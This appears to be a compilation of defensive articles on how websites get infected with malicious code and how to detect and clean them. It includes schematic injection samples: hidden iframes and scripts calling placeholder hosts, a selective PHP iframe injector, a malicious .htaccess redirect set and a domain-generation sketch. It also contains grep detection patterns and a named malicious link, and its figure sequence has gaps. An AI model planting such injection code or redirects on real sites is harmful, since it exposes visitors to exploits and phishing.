Malicious web pages: what malicious code is, how websites become infected, and how to fight it

Typical signs that a website has been compromised:

  • users complain that the website is blocked by the browser and/or by security software
  • the website has been put on Google's blacklist or into another database of malicious URLs
  • there have been major changes in traffic volume and/or in search engine rankings
  • the website does not work as it should, and produces errors and warnings
  • after visiting the website, the computer behaves strangely.

Often malicious code remains unnoticed for a long time, especially in the case of infection with very complex malware. Such malware is usually heavily obfuscated in order to mislead both website administrators and antivirus programs; it constantly changes the domain names to which users are redirected, thereby evading blacklists. If none of the above symptoms is present, that is a good sign that your server is clean, although, alas, not a 100% guarantee; so stay alert to any suspicious activity.

The most obvious sign of infection by any malware is the presence of malicious/suspicious code in one or more files, mainly in HTML, PHP or JS format, and for some time now also ASP/ASPX. This code is not easy to find without at least a basic knowledge of programming and website development. To give the reader a better idea of what malicious code looks like, here are a few examples of the most common web page infections.

Example 1: Simple redirection

The oldest and simplest method used by cybercriminals is the addition of a simple HTML iframe tag to the code of an HTML file on the server. The address used to load the malicious website in the iframe is specified in the src attribute; the visibility attribute with the value "hidden" makes the frame invisible to the user visiting the page.

Figure 1. A malicious iframe inside the HTML code of a website
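Schematically, such an injected tag looks something like this (the domain is a placeholder, not a real address):

<iframe src="http://malicious.example/in.cgi?5" width="1" height="1" style="visibility: hidden;"></iframe>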

Another method of executing a malicious script in the user's browser is to insert a link to that script into the HTML file as the src attribute of a script or img tag:

Figure 2: Examples of malicious links
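Schematic examples of such injected links (placeholder addresses):

<script src="http://malicious.example/evil.js"></script>
<img src="http://malicious.example/img.php" width="1" height="1">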

Recently there have been more and more cases in which malicious code is generated dynamically and injected into the HTML code by malicious JS or PHP scripts. In such cases the code is visible only when viewing the page source in the browser, not in the physical files on the server. Cybercriminals can additionally define the conditions under which the malicious code is to be generated: for example, only when the user has arrived at the site from certain search engines, or has opened the website in a particular browser.

To deceive both the website owner and antivirus software, and to make the malicious code harder to analyze, cybercriminals use a variety of code obfuscation methods.

Example 2: "Error 404: Page not found"

In this example, malicious code is embedded in the message template displayed when the requested object is not found on the server (the well-known error 404). In addition, a link to some non-existent element is inserted into the index.html/index.php files in order to trigger this error imperceptibly every time a user visits the infected web page. This method can cause some confusion: the person responsible for the website receives a message saying that some antivirus solution has flagged the website as infected; after a superficial check it turns out that the malicious code was found in an object that apparently does not exist; this makes it tempting to assume (erroneously) that it was a false alarm. The trigger itself can be as small as the single line sketched below.
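A schematic (hypothetical) example of such a trigger planted in index.html:

<img src="/no-such-file.gif" width="1" height="1" alt="">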

Figure 3. Trojan.JS.Iframe.zs - the malicious script in the 404 error message template

In this particular case the malicious code was obfuscated. After deobfuscation we can see that the purpose of the script is to inject an iframe tag, which will be used to redirect users to a malicious URL.

Figure 4. Trojan.JS.Iframe.zs - the malicious code after deobfuscation

Example 3: Selective malicious code injection

Similar code can be generated and attached dynamically (i.e. depending on specific conditions) to all HTML files located on the server by a malicious PHP script uploaded to the same server. The script shown in the following example checks the User-Agent parameter (which is sent by the user's browser as well as by search bots) and does not add the malicious code if the website is being scanned by a bot or if the site visitor uses the Opera or Safari browser. In this way, users of browsers that are invulnerable to the specific exploit used in the attack are not redirected to that exploit. It is also worth noting that the comments in the code are deliberately misleading, suggesting that the script has something to do with bot statistics.

Figure 5. Trojan.PHP.Iframer.e - the infecting PHP script
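A minimal sketch of this selective-injection logic (a real sample would be obfuscated; all domains and names here are placeholders):

<?php
// Sketch only: skip search bots and browsers the exploit cannot reach.
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$skip = array('bot', 'spider', 'crawler', 'opera', 'safari');
$inject = true;
foreach ($skip as $needle) {
    if (stripos($ua, $needle) !== false) {
        $inject = false;
        break;
    }
}
if ($inject) {
    // Appended to every served page; invisible to the visitor.
    echo '<iframe src="http://malicious.example/exploit.php" width="1" height="1" style="visibility: hidden;"></iframe>';
}
?>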

This method can also be used in the opposite direction: cybercriminals can inject links leading to illegal, dubious or malicious content (spam, spyware, phishing resources) only when it is a search bot that has visited the website. The purpose of such an attack is so-called black-hat SEO: a mechanism for raising the position of a cybercriminal resource in search results. Such malware usually targets popular, highly ranked web portals, and it is quite difficult to detect, since the malicious code is never shown to the ordinary user. As a result, the malicious websites receive a high rating in search engines and end up at the top of the search results.

Example 4: Superficial obfuscation

Infecting PHP scripts can also take other forms. Below are two examples discovered several months ago.


Figure 6. Trojan-Downloader.PHP.KScript.a - the infecting PHP script


Figure 12. Trojan-Downloader.JS.Twetti.t - malicious code injected into JS files

Finally, there is a well-known case of mass infection that uses randomly generated domain names. If infected with this malware, you may detect the following code on your website:

Figure 13. A fragment of the code that redirects users to a randomly generated domain
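A sketch of the date-seeded domain generation technique (illustrative PHP, not actual malware code; the TLD is a placeholder):

<?php
// The same date always yields the same "random" domain, keeping infected
// pages in sync with the domains the attacker registers in advance.
function pseudoRandomDomain($date) {
    mt_srand(crc32($date));                // seed derived from the current date
    $name = '';
    for ($i = 0; $i < 12; $i++) {
        $name .= chr(mt_rand(ord('a'), ord('z')));
    }
    return $name . '.com';
}
echo pseudoRandomDomain(date('Y-m-d'));    // same output for every visitor today
?>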

Example 6: "Gootkit" and obfuscation of the entire file

Obfuscated malicious code is easy to spot among the rest of the clean code, so recently it has occurred to cybercriminals to obfuscate the contents of the file in its entirety, rendering both the injected and the legitimate code unreadable. It is impossible to separate the legitimate code from the malicious, and the file can only be cured after decrypting it.

Figure 14. A file obfuscated by the "Gootkit" malware

Getting rid of the first level of obfuscation is easy: you just need to replace the eval() function with alert(), or print() in the case of the console, and run the code. The second level is somewhat more complicated: there, the domain name is used as the key for encrypting the code.
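The text above describes the JavaScript case; the same eval-replacement trick works for PHP droppers, as in this minimal sketch (placeholder payload):

<?php
$layer1 = base64_decode('ZWNobyAiaGlkZGVuIjs=');  // decodes to: echo "hidden";
// eval($layer1);   // what the malware would do: execute the hidden layer
print($layer1);     // what the analyst does instead: reveal it without running it
?>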

Figure 15. "Gootkit" - the second level of obfuscation

After decryption, the malicious code, which follows the original contents of the file, becomes visible:

Figure 16. "Gootkit" - the deobfuscated code

Sometimes the malicious part turns out to be the second version of the malware discussed in the previous example, used to generate a pseudo-random domain name for the redirect.

Example 7: .htaccess

Instead of infecting scripts and HTML code, cybercriminals can exploit the capabilities of certain files, for example .htaccess. In such files the administrator can define access rights to specific folders on the server, and can also redirect users to other URLs under certain circumstances (for example, if the user comes from a mobile device's browser, they are redirected to the mobile version of the website). It is not difficult to guess how cybercriminals use such functionality...

Figure 17. A malicious .htaccess file

In the example above, all users who land on this website by following a link in most major search engines (the HTTP_REFERER parameter) are redirected to a malicious URL. In addition, this .htaccess file lists a fairly large number of browsers and bots for which the redirect is not performed (the HTTP_USER_AGENT parameter). The redirect also does not occur if the web page is read from a cache (Referer == cache) or loaded from the same computer (the cookie parameter).
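Schematically, such a rule set might look like this (a hypothetical reconstruction with a placeholder target, not the actual sample):

RewriteEngine On
# Redirect only visitors arriving from major search engines...
RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\. [NC]
# ...but not search bots or browsers the exploit cannot reach.
RewriteCond %{HTTP_USER_AGENT} !(googlebot|bingbot|slurp|opera) [NC]
RewriteRule .* http://malicious.example/in.cgi?8 [R=302,L]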

Such malware makes more selective infection possible: for example, specific IP addresses can be excluded, so that when the website is viewed from a particular IP range, say one belonging to an information security company, no malicious results are served.

Attack vectors and infection technologies

Regardless of the technologies used, cybercriminals need to find a way to deliver malicious files to the server or to modify files already there. The most primitive method of gaining access to the server is cracking the access password. To do this, cybercriminals can use a so-called brute-force attack or its limited version, a dictionary attack. Such tactics usually require a lot of time and resources, so they are rarely used in mass website infections. More popular scenarios involve exploiting vulnerabilities and using password-stealing malware.

Exploiting vulnerabilities in content management / e-commerce systems

Most modern web content management platforms (content management systems (CMS), e-commerce systems, control panels, etc.) are imperfect and contain vulnerabilities that allow files to be uploaded to the server without any authentication. And although developers are constantly searching for such vulnerabilities, releasing patches takes a long time; in addition, many users continue to run old, bug-ridden versions of the software. Vulnerabilities are found most often, naturally, in the most popular platforms, such as WordPress, Joomla and osCommerce.

A well-known example of such a vulnerability is TimThumb, which is widely exploited by cybercriminals in a variety of drive-by scenarios. TimThumb is a PHP module for resizing images and creating so-called graphic thumbnails, which is included in many publicly available CMS templates. The vulnerability allows files located on a remote machine to be written to the server's cache directory. Another example is the SQL injection vulnerability in Plesk Panel (version 10 and older) found in February 2012, which allows databases to be read and passwords stolen; until recently, these were stored in plain text. The credentials obtained in this way were probably used in a recent mass web epidemic (see http://www.securelist.com/en/blog/208193624/who_is_attacking_me and https://www.securelist.com/ru/blog/208193713/runforestrun_gootkit_i_generirovanie_sluchasyynykh_domnykh_imen).

Using spyware to steal credentials for accessing the FTP server

In the most widespread web infections (for example, Gumblar and Pegel), another method has proved successful. At the first stage, cybercriminals distribute malware designed specifically to find and steal user names and passwords for FTP accounts, by checking FTP client settings or by scanning network traffic. After the malware finds these credentials on the infected computer of a site administrator, it establishes a connection to the FTP server and uploads malicious scripts, or overwrites the original files with infected versions. It goes without saying that as long as the account owner's computer remains infected, the files stored on the server will become infected again and again, even after the credentials are changed and all content is restored from a clean backup.

Objectives of cybercrime

What is the purpose of infecting websites?

  • redirecting users to exploits, for the unnoticed installation of malicious programs on their computers;
  • redirecting users to spam, phishing and other malicious, illegal or unwanted content;
  • intercepting/stealing site visits and search queries;
  • promoting malicious/illegal websites and websites containing spam (black-hat SEO);
  • using server resources for illegal activity.

In essence, there is nothing new here: when infecting websites, cybercriminals are driven by the desire to make a profit, even if indirectly.

Methods of eliminating malicious code

What should you do if your site has been attacked by hackers?

First, if you observe symptoms suggesting a possible infection, the website must be deactivated immediately until the problem is eliminated. This is genuinely critical, because every moment of delay plays into the cybercriminals' hands, allowing the infection to reach more computers and to spread across the Internet. You should also check the server logs for suspicious activity, for example strange requests from IP addresses in countries uncharacteristic of the site's visitors, etc.; this can be useful for finding the infected files and determining exactly how the cybercriminals gained access to the server.

But how do you deal with the malicious code itself?

Backup copy

The fastest and most reliable way to restore the entire contents of the server is from a clean backup. For this to be effective, a complete reinstallation of the software running on the server (content management systems/CMF, e-commerce systems, etc.) is also necessary, using, of course, the latest, fully updated versions. After these steps, there should be no infected files left on the server, provided that you erased all content before the recovery and that the backup was created before the attack began.

Automatic check

If there is no clean backup, you have no choice but to start fighting the malware. Fortunately, there are a number of automated solutions that help find malicious code, including antivirus products and online website scanners such as http://sucuri.net/. None of them is perfect, but against well-known/common malware they can all be very useful. For a start, you can check the website with several online scanners. Some of them will not only determine whether your site is actually infected, but will also point out the malicious code in your files. Then you can run a full antivirus scan of all the files on the server.

If you are the owner of the server, or if a security solution that you are entitled to use is running on the server, you can scan on the server side. Make sure you have made a copy of your files first, because some antivirus scanners do not disinfect infected files but delete them! You can also download the contents of your server to a local computer and check it with a desktop antivirus solution. The second option is preferable, since most modern desktop antivirus programs have a well-developed heuristic module. Malware that targets websites is highly polymorphic: while signature analysis is practically useless against it, heuristics detect it easily.

Manual removal

If the automatic check produced no results and messages about your site being infected keep arriving, the only way to get rid of the malware is to find it manually and remove all the malicious code. This difficult task can take a considerable amount of time, since every file, whether HTML, JS, PHP or a configuration file, has to be checked for malicious scripts. The examples above are just a small sample of the variety of website malware, so the malicious code on your site is likely to differ partially or completely from these samples. Nevertheless, most modern website malware shares certain common features, and these features will help in pinpointing the problem.

Above all, pay attention to those parts of the code that look unclear or unreadable. Code obfuscation, a technique malware writers use frequently, is quite unusual for any other website-related software. If you did not obfuscate the code yourself, you have every reason to be suspicious of it. But be careful: not all obfuscated code is malicious!

Similarly, not every malicious script is obfuscated, so it makes sense to search all your files for explicit iframe tags and other links to external resources. Some of them may be related to advertising and statistics, but do not take the bait of specially crafted URLs, which can cause confusion by mimicking the addresses of well-known and trusted portals. Do not forget to check the code of the error message templates, as well as all .htaccess files.

Useful tools for finding malicious code on the server are undoubtedly grep and find, command-line utilities included by default in virtually all Unix-based systems. Below are examples of their use in diagnosing the most common infections:

grep -irs "iframe" *
grep -irs "eval" *
grep -irs "unescape" *
grep -irs "base64_decode" *
grep -irs "var div_colors" *
grep -irs "var _0x" *
grep -irs "CoreLibrariesHandler" *
grep -irs "pingnow" *
grep -irs "serchbot" *
grep -irs "km0ae9gr6m" *
grep -irs "c3284d" *
find . -iname "upd.php"
find . -iname "*timthumb*"
The description of grep (from the Linux manual): print lines matching a pattern; the -i option means ignore case; -r means recursive search, and -s suppresses error messages. The first of the commands listed above searches files for iframe tags; the next three look for the most obvious signs of obfuscation; the rest look for specific strings associated with the largest known website infections.

As for find, the Linux manual says: search for files in a directory hierarchy; "." (dot) indicates the current directory (so these commands should be run from the root or home directory on the server); the -iname parameter defines the name of the file to search for, ignoring case. Regular expressions can be used to find all files matching certain criteria, as in the example below.
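For instance, a single case-insensitive search covering both of the file names above might look like this (GNU find; the pattern is only an illustration):

find . -regextype posix-extended -iregex '.*(upd|timthumb).*'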

Of course, you always need to know what you are looking for: not every result will indicate an infection. It is a good idea to check suspicious pieces of code with an antivirus scanner or to search for them in Google. You will most likely find some answers, for both malicious and clean code. If you are still not sure whether a file is infected, the best course is to deactivate the website (just in case) and seek a specialist's advice before taking any further action.

Very important!

In addition to cleaning the files on the server, be sure to run a full antivirus scan of all computers used to upload and manage content on the server, and to change the credentials for all accounts on the server that you maintain (FTP, SSH, control panels, etc.).

Security Basics for Websites

Unfortunately, in most cases removing the malicious code is not enough to get rid of the infection once and for all. If your website has been infected, this may point to vulnerabilities that allowed the cybercriminals to inject malicious scripts into the server; if you leave this problem unattended, new infections await you in the near future. To prevent this, you need to take appropriate measures to protect the server and the computer(s) used to administer it.

  • Use strong passwords. Despite the triviality of this advice, it really is the foundation of server security. Passwords must not only be changed after every incident and/or attack on the server, they must also be changed on a regular basis, for example monthly. A good password must meet special criteria, which can be found at www.kaspersky.com/passwords;
  • Regular updates. Do not forget about regular updates either. Cybercriminals frequently exploit vulnerabilities, regardless of the purpose of the malicious program, whether it targets PC users or websites. All software with which you manage your server/site content must be the latest version, and every security update must be installed as soon as it is released. Using current software versions and installing all necessary patches promptly will help reduce the risk of attack via exploits. A regularly updated list of known vulnerabilities can be found at http://cve.mitre.org/;
  • Regular backups. Having a clean copy of the server content in reserve will save you a lot of time and effort; in addition to helping cure an infection, fresh backups can be very useful in solving other problems;
  • Regular file checks. Even in the absence of explicit symptoms of infection, it is recommended to scan all the files on the server periodically for malicious code;
  • PC security. Since a significant amount of website malware is distributed through infected PCs, the security of the desktop computer used to manage your website is one of the highest-priority aspects of website security. Constantly maintaining the cleanliness and security of your computer considerably increases the likelihood that your website will also be safe and virus-free.
  • The following actions should be mandatory (though they are not sufficient on their own):
    • removing unused programs;
    • deactivating unnecessary services and modules;
    • setting appropriate policies for individual users and user groups;
    • setting adequate access rights to specific files and directories;
    • disabling directory listing on the web server;
    • keeping event logs and checking them regularly for suspicious activity;
    • using encryption and secure protocols.

Malware designed to infect websites can be a real nightmare for web administrators and Internet users. Cybercriminals are continuously developing their technologies and discovering new exploits. Malware spreads rapidly over the Internet, hitting servers and workstations. It is fair to say that no reliable way exists to eliminate this threat completely. However, every website owner and every Internet user can make the Internet safer by observing basic security rules and by constantly keeping their websites and computers safe and clean.


This article is aimed at Internet users and the owners of information resources. Its purpose is to describe the methods by which websites are infected with malicious code, the possible consequences of this, and the methods of combating the malware.

So what is this malicious code, where does it come from, and how dangerous is it?

Malicious code here means a link to a resource containing malware. The most common payloads today are either a fake antivirus (Fake AntiVirus), a module that substitutes search engine results, or software for sending spam. In some cases the malware can additionally steal confidential data from the user's computer, for example passwords for administrative web management interfaces, FTP passwords, or accounts for online services.

1) The malicious link leads to a traffic distribution system (TDS). A traffic distribution system makes it possible to redirect the visitor to different resources depending on their country, operating system, browser, language and other details. These resources, in turn, contain malware aimed precisely at that audience or at specific vulnerable software. Moreover, if the link is followed from a browser or operating system version that the attacker did not anticipate, you will see either just a blank screen or, for example, the Google search page. This makes identifying the malware somewhat more difficult. Nevertheless, with careful analysis the logic of the system can be understood and the infection guarded against.
2) The malicious link leads to exploits ("sploits") for popular browsers and software products. Exploits are specially crafted pieces of code that use software vulnerabilities to download and execute malware on the user's computer unnoticed. In this case the user's software is identified and, if it is vulnerable, the infection takes place.

To hide the presence of malicious code on a website it is usually encrypted, although cases of unencrypted, open code also occur.

An example of an encrypted malicious link:

Let us briefly analyze the structure of a malicious link:
domain name - bestlotron.cn
script - in.cgi (the Sutra traffic distribution system)
scheme - cocacola51

Put together, these parts give a link of the form http://bestlotron.cn/in.cgi?cocacola51.

Malicious links that redirect through a traffic distribution system have recently been the most common. In this case an attacker who has gained access to a website and planted in it a malicious link pointing to a TDS on his own resource can manage the traffic coming from that website. The cocacola51 scheme given in the example may serve more than one piece of malware. The traffic distribution system is thus merely an intermediary between the visitors of a hacked website and the attacker's malware.

The second example clearly demonstrates an encrypted malicious link. As a rule, simple algorithms are used for this encryption, and almost 99% of such links are easily decrypted.

After decryption, we get the following code:

Now we can again see the site address and, familiar from the first example, the script of the traffic distribution system, this time with scheme 3.

Where does this code on websites come from, and why is it dangerous?
As a rule, websites are no longer hacked manually; everything was automated long ago. Hackers have written a great deal of application and server software for these purposes. The most common automated process for embedding malicious links into websites is the theft of FTP passwords and the subsequent processing of this data by a specialized application, an "iframer". An iframer's job is simple: connect to the resources in a list of FTP accounts, find files matching a given mask (as a rule, these are the website's index page files), and embed ready-made malicious code into them. This is why, after the code is removed, many websites become infected again even when all access passwords, including FTP, have been changed. The reason may be a password-stealing virus on the computer from which the website is administered.

There are cases where the owners of websites on which malicious code has appeared do not take the issue seriously. True, the code as such does no harm to the resource itself; only the visitors of the infected website suffer. But there are other aspects worth paying attention to.

A website hosting malicious code will sooner or later end up in all sorts of blocklists (malware site lists), and search engines such as Google or Yandex may mark the infected website as potentially dangerous. Removing your resource from such a database is extremely difficult. Nor can you rule out sooner or later receiving an "abuse" complaint from the website's visitors. In that case both the website's domain name and its IP address may be blocked; there have been cases when entire subnets were blocked because of a single infected website.

How can you protect yourself against the appearance of malicious code on your resources? To do this, a number of information security requirements must be met:

1) Install antivirus software, preferably licensed and with daily-updated databases, on the working computer from which the website is administered.
2) Install and configure a firewall so that all traffic is inspected when working with the network, and connections to suspicious hosts can be blocked.
3) Use complex passwords for administrative interfaces and for the FTP and SSH services.
4) Do not save passwords in Total Commander, FAR and other file managers: almost all Trojan programs can already harvest this data and pass it to the attacker.
5) Do not open or run files received by e-mail or downloaded from the Internet without first checking them with antivirus software.
6) Keep the software installed on the computer up to date. Install operating system patches and application updates promptly. The programs you use every day can sometimes serve as the hole through which malware penetrates the system, in particular Adobe Acrobat Reader, Flash Player, the MS Office programs, etc.

If you follow all the protection measures described above and still detect malicious code on your resource, the cause may also lie with the hosting provider, or rather with the configuration of the server hosting your resource. In that case you should contact your hosting provider's support service and ask them to identify and eliminate the cause of the incident.

As is known, the UZ-CERT computer incident response service was created in Uzbekistan in September 2005. Besides their main duties, the service's specialists also work on detecting malicious code on sites in the national domain zone. A number of application programs have been written to automate the main tasks, but manual inspection of websites suspected of infection naturally also plays an important role: sometimes well-disguised malicious code that has undergone "obfuscation", a change of code structure, cannot be detected by automatic tools. Information about all detected infected websites is published on the service's website, as well as in the UZ-CERT section on uforum.uz. The owners of infected resources receive alerts, consultations and assistance in eliminating the threats and further protecting their systems. We sincerely hope that this work benefits Internet users and helps avoid the mass infection of personal computers with malware.


A virus has appeared on your site, and, like any infected object, your web resource has turned into one big source of trouble: not only does it no longer make a profit, it also corrodes your reputation on the Internet, and buyers, search engines and even your hosting provider turn away from you.

You are left alone with your problem and try to solve it by your own efforts, not by turning to professionals but by following the advice of "specialists" from forums. Or you order the disinfection of the site wherever it is "cheaper". Understandably, one always wants to solve the problem as quickly and as cheaply as possible. But is such an approach always justified?

We present the top 7 mistakes of the past year committed by webmasters trying to restore a site to working order after hacking and infection.

Mistake No. 1. Restoring the site from a backup as a way of getting rid of malicious code

Very often webmasters try to solve the problem of a malicious code infection by rolling the site back to the last clean version, and then keep restoring the web project every time the virus on the site makes itself felt again. Alas, this is an inconvenient and very risky option.

The correct solution: the site needs to be disinfected and protected against hacking to avoid re-infection. First, the site's content may have been updated, new plugins may have been installed, and changes may have been made to the site scripts: every rollback means losing the results of all the most recent work. But there is a more important reason to fight the hack decisively: what if the hacker one day decides to destroy your site completely, given that he has access to your web resource?

Mistake No. 2. Trying to trick the search engine into lifting its sanctions from the site

A site lands on the list of resources "that threaten the security of a computer or mobile device..." because of a virus on the site or because visitors are redirected to an infected resource. Examples of infected pages are displayed in the webmaster panel, but a cunning or ignorant webmaster, instead of solving the problem (finding and removing the malicious source), deletes the particular pages that the search engine shows as examples of infection. Or, alternatively, blocks access to the site entirely with rules in robots.txt, naively believing that this also blocks the antivirus bot's access to the site.

The correct solution: you need to find the viral code on the site and remove it. Prohibiting indexing is not merely useless, it is dangerous. First, the site's pages may drop out of the search index. And second, the antivirus service's robot operates by rules different from those of the search robot, and a prohibition on indexing has no effect on it.

Mistake No. 3. Using a malicious code scanner without competent specialists

To save money, or for some other reason, the disinfection of the site is undertaken by an insufficiently prepared specialist who cannot determine with 100% certainty whether a fragment flagged by the malicious code scanner is really dangerous. As a result, one of two extremes can be observed: absolutely everything suspected of being a virus is removed, which breaks the site, or the malicious code is not eliminated completely, which provokes a relapse.

The correct solution: obviously, the disinfection of a web resource should be handled by professionals. Malware scanner reports contain false positives, since the same fragment can be used in legitimate code and in hacker code alike. Every file has to be analyzed; otherwise critical elements may be removed, leading to failures on the site or to its complete breakdown. Or, on the contrary, there is the risk of failing to recognize a hacker shell, which will lead to the re-infection of the web resource.

Mistake No. 4. Ignoring messages (in the webmaster panel) about the presence of malicious code on the site

Notifications in the webmaster panel about malicious code on the site can be intermittent. Today the system writes that there is a virus on your site; tomorrow it is silent. It is more pleasant for the site owner to believe that there was some glitch in the system and that his website is beyond suspicion. In practice, however, things are different. There are different types of infection. Malicious code may appear on the site only for a certain period and then disappear. This means that during one check by the search engine's antivirus bot, malicious activity may be detected, and during another, not. As a result, the webmaster "relaxes" and begins to ignore the dangerous message: why waste time on treatment if the site has not been blocked?

The correct solution: even if no malicious activity is visible on the site right now, your web resource has most likely been hacked and infected. Viruses do not appear on a site by themselves. The fact that the search engine discovered suspicious code on the site and then fell "silent" should not be ignored by the webmaster; on the contrary, it should serve as an alarm signal. Who knows how your resource will be exploited tomorrow: spam, phishing or redirects? You need to scan the site for hacker backdoors and shells immediately, disinfect it, and protect it against hacking.

Mistake No. 5. Having the site treated by non-professional freelancers

In principle, working with freelancers on this issue is no different from other spheres: cheap is not always good, and it almost always comes without guarantees or a contractual relationship. Most freelancers who do not specialize in site security work on the consequences of a hacker attack, not on its cause, the website's vulnerabilities. This means the site can be hacked again. Worse, there are also unscrupulous performers who may plant yet more malicious code on the site, steal the database, and so on.

The correct solution: contact a specialized company that deals with the disinfection of sites and their protection against hacking. The employees of such companies remove malicious code every day, see viruses mutate and follow the evolution of hacker attacks. The black market of site hacking does not stand still; it develops, and it demands constant monitoring and an up-to-date response in the treatment and protection of sites against unauthorized intrusion.

Mistake No. 6. Removing the same virus from the site daily/weekly

This problem concerns the special "enthusiasts" who are prepared to eliminate the consequences of hacking on a regular basis. Such webmasters already know exactly which code will be planted on the site, exactly where, and when it will happen. One can fight endlessly against a mobile redirect that an attacker injects into the .htaccess file every day at 09:30, redirecting your mobile traffic to a site selling Viagra or porn content. The catch is that the hacker's bot does this automatically, while you have to perform the removal operation by hand. Hardly a fair fight, is it?

The correct solution: you can delete the consequences (viruses, redirects, etc.) endlessly, but it is more effective to check the site for malicious and hacker scripts, remove them, and install protection against hacking so that the virus code stops appearing, and then to spend the freed-up time more productively. The main thing to remember is that the hacker already has access to your site, which means that next time he may not limit himself to planting harmful code but may use your site for more serious cybercrimes.

Mistake No. 7. Treating an infected site with an antivirus intended for a computer

For some webmasters the concept of "antivirus" is universal, and they try to cure a hacked, infected site with an antivirus intended for a desktop computer: a backup of the site is made and then checked with desktop antivirus software. Alas, such treatment cannot produce the desired result.

The correct solution: viruses on a site and viruses on a computer are not the same thing. To check a site, you need to use specialized software or turn to specialists. Desktop antiviruses, however good they may be, are not designed to clean websites of viruses, since their databases focus on viruses and Trojans found on computers.

That's all. Do not step on the same rake!

Currently, most computer attacks occur when visiting malicious web pages. The user may be misled into submitting confidential data to a phishing site, or may become the victim of a drive-by download attack that exploits browser vulnerabilities. Accordingly, a modern antivirus must provide protection not only directly against malicious software, but also against dangerous web resources.

Antivirus solutions use various methods to identify sites containing malware: signature database comparison and heuristic analysis. Signatures allow known threats to be identified precisely, while heuristic analysis estimates the likelihood of dangerous behavior. Using a virus database is the more reliable method and produces a minimal number of false positives, but it cannot detect the newest, as yet unknown threats. The difference between the two approaches is illustrated by the sketch below.
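A deliberately simplified sketch (hypothetical signature strings; a real engine is far more involved):

<?php
// Signature matching: exact known-bad strings; precise, but blind to new threats.
$signatures = array('km0ae9gr6m', 'c3284d');
$content = file_get_contents('page.html');
foreach ($signatures as $sig) {
    if (stripos($content, $sig) !== false) {
        echo "signature hit: $sig\n";
    }
}
// A heuristic instead scores suspicious traits, such as eval() applied to
// decoded data; this also matches some legitimate code (false positives).
if (preg_match('/eval\s*\(\s*(unescape|base64_decode)/i', $content)) {
    echo "heuristic: suspicious eval of decoded data\n";
}
?>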

A newly emerged threat must first be detected and analyzed by the staff of an antivirus vendor's laboratory. Based on this analysis, an appropriate signature is created that can then be used to find the malware. The heuristic method, by contrast, is used to identify unknown threats on the basis of suspicious behavioral factors. This method estimates the likelihood of danger, so false positives are possible.

When malicious links are detected, both methods can work simultaneously. To add a dangerous resource to the list of prohibited sites (a blacklist), it must be analyzed by downloading its content and scanning it with an antivirus or an intrusion detection system (IDS).

Below is the event log of the Suricata IDS when blocking exploits:

An example of an IDS report indicating threats identified by signatures:

An example of an Ad-Aware antivirus warning when visiting a malicious site:

Heuristic analysis is performed on the client side to check the sites being visited. Specially designed algorithms warn the user if a visited resource shows dangerous or suspicious characteristics. These algorithms may be built on lexical analysis of the content or on an assessment of the resource's location. The lexical model is used to warn the user of phishing attacks: for example, URLs such as "http://paaypall.5gbfree.com/index.php" or "http://paypal-intern.de/secure/" are easily identified as phishing copies of the well-known payment system PayPal.
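A toy sketch of such a lexical check (hypothetical function and threshold; real algorithms weigh many more features):

<?php
// Flag a host whose labels are suspiciously close to a known brand name.
function looksLikePhishing($host, array $brands, $maxDistance = 2) {
    foreach (explode('.', strtolower($host)) as $label) {
        foreach ($brands as $brand) {
            $d = levenshtein($label, $brand);
            if ($d > 0 && $d <= $maxDistance) {
                return true;   // e.g. "paaypall" vs "paypal" (distance 2)
            }
        }
    }
    return false;
}
var_dump(looksLikePhishing('paaypall.5gbfree.com', array('paypal'))); // bool(true)
?>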

Location analysis collects information about the hosting and the domain name. Based on the data obtained, a specialized algorithm determines the site's degree of danger. These data usually include geographic information, details of the registrar, and details of the person who registered the domain.

Below is an example of several phishing sites hosted at a single IP address:

Ultimately, despite the many ways of evaluating sites, no single technique can guarantee 100% protection of your system. Only the combined use of several computer security technologies can give real confidence in the protection of personal data.